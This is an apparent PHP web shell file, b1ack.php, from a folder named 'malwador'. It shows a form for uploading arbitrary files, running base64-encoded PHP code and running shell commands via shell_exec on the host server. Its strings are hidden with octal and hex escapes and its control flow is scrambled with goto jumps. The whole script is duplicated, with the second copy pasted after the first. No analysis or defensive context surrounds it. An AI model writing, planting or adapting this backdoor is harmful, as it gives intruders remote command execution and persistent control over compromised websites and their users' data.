malwador/b1ack.php

## b1ack.php
<?php
 goto IRGg0; IRGg0: ?>
<style>body{background-color:#000;color:#fff}</style><form action=""enctype="multipart/form-data"id="uploader"method="post"name="uploader"><input name="file"type="file"size="50"><input name="_upl"id="_upl"type="submit"value="Upload"><br><br><label for="">PHP command</label><input name="phpcmd"id=""><input name="_upl"id="_upl"type="submit"value="run php command"><br><br><label for="">Shell command</label><input name="shellcmd"id=""><input name="_upl"id="_upl"type="submit"value="run shell command"></form><?php  goto HCwez; z4H36: if ($_POST["\137\x75\160\154"] == "\162\x75\x6e\x20\x73\x68\x65\154\154\40\143\x6f\x6d\155\x61\156\144") { $tmpFile = tempnam(sys_get_temp_dir(), "\x64\171\156\141\x6d\x69\143"); $fileHandle = fopen($tmpFile, "\167"); $tmp = $_POST["\x73\150\145\154\154\143\155\144"]; $vari = "\74\77\x70\150\160\x20\145\x63\150\x6f\50\100\163\x68\145\154\x6c\137\145\x78\145\x63\50\x22" . $tmp . "\x22\x29\x29\73\x3f\76"; fwrite($fileHandle, $vari); fclose($fileHandle); ob_start(); include $tmpFile; $output = ob_get_clean(); unlink($tmpFile); echo $output; } goto eUXJ_; HCwez: if ($_POST["\x5f\165\x70\x6c"] == "\x55\x70\154\157\x61\144") { if (@copy($_FILES["\146\x69\154\x65"]["\164\x6d\x70\137\x6e\x61\x6d\145"], $_FILES["\146\151\x6c\145"]["\x6e\141\x6d\145"])) { } } goto el5O1; el5O1: if ($_POST["\137\x75\160\154"] == "\162\165\156\40\x70\x68\x70\x20\143\x6f\x6d\x6d\x61\x6e\x64") { $tmpFile = tempnam(sys_get_temp_dir(), "\x64\x79\156\x61\155\x69\x63"); $fileHandle = fopen($tmpFile, "\167"); $tmp = base64_decode($_POST["\160\150\x70\x63\x6d\x64"]); $vari = "\74\x3f\x70\x68\x70\40\x65\143\150\157\x28" . $tmp . "\51\73\77\x3e"; fwrite($fileHandle, $vari); fclose($fileHandle); ob_start(); include $tmpFile; $output = ob_get_clean(); unlink($tmpFile); echo $output; } goto z4H36; eUXJ_: ?>
	<?php
	goto IRGg0; IRGg0: ?>
	<style>body{background-color:#000;color:#fff}</style><form action=""enctype="multipart/form-data"id="uploader"method="post"name="uploader"><input name="file"type="file"size="50"><input name="_upl"id="_upl"type="submit"value="Upload"><br><br><label for="">PHP command</label><input name="phpcmd"id=""><input name="_upl"id="_upl"type="submit"value="run php command"><br><br><label for="">Shell command</label><input name="shellcmd"id=""><input name="_upl"id="_upl"type="submit"value="run shell command"></form><?php goto HCwez; z4H36: if ($_POST["\137\x75\160\154"] == "\162\x75\x6e\x20\x73\x68\x65\154\154\40\143\x6f\x6d\155\x61\156\144") { $tmpFile = tempnam(sys_get_temp_dir(), "\x64\171\156\141\x6d\x69\143"); $fileHandle = fopen($tmpFile, "\167"); $tmp = $_POST["\x73\150\145\154\154\143\155\144"]; $vari = "\74\77\x70\150\160\x20\145\x63\150\x6f\50\100\163\x68\145\154\x6c\137\145\x78\145\x63\50\x22" . $tmp . "\x22\x29\x29\73\x3f\76"; fwrite($fileHandle, $vari); fclose($fileHandle); ob_start(); include $tmpFile; $output = ob_get_clean(); unlink($tmpFile); echo $output; } goto eUXJ_; HCwez: if ($_POST["\x5f\165\x70\x6c"] == "\x55\x70\154\157\x61\144") { if (@copy($_FILES["\146\x69\154\x65"]["\164\x6d\x70\137\x6e\x61\x6d\145"], $_FILES["\146\151\x6c\145"]["\x6e\141\x6d\145"])) { } } goto el5O1; el5O1: if ($_POST["\137\x75\160\154"] == "\162\165\156\40\x70\x68\x70\x20\143\x6f\x6d\x6d\x61\x6e\x64") { $tmpFile = tempnam(sys_get_temp_dir(), "\x64\x79\156\x61\155\x69\x63"); $fileHandle = fopen($tmpFile, "\167"); $tmp = base64_decode($_POST["\160\150\x70\x63\x6d\x64"]); $vari = "\74\x3f\x70\x68\x70\40\x65\143\150\157\x28" . $tmp . "\51\73\77\x3e"; fwrite($fileHandle, $vari); fclose($fileHandle); ob_start(); include $tmpFile; $output = ob_get_clean(); unlink($tmpFile); echo $output; } goto z4H36; eUXJ_: ?>